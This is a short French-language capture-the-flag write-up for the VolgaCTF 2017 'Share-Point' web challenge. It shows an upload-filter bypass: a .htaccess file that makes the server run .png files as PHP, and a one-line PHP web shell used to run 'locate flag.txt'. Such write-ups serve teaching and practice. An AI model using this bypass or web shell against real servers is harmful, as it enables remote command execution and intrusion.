/ web

VolgaCTF Qualif - Share-Point (WEB 200)

Enoncé :

Look! I wrote a good service for sharing your files with your friends, enjoy)
share-point.quals.2017.volgactf.ru

Le but de cette épreuve est d'aller lire le flag sur le serveur.
L'upload de fichier nous empêche le php ou html, il faut donc chercher autre part.

La faille se trouve dans le fait que l'on puisse uploadé un fichier .htaccess
On créer alors notre fichier contenant
AddType application/x-httpd-php .png

Cela permet de dire au serveur que tout le format png sera interprété comme du php.

On upload le fichier cmd.png contenant :
<?php system ($_GET['cmd1']); ?>
alt
On peut chercher le fichier flag.txt avec la commande suivante
http://share-point.quals.2017.volgactf.ru/files/pte/cmd.png?cmd1=locate%20flag.txt

On sait alors que le flag est dans /opt/flag.txt
alt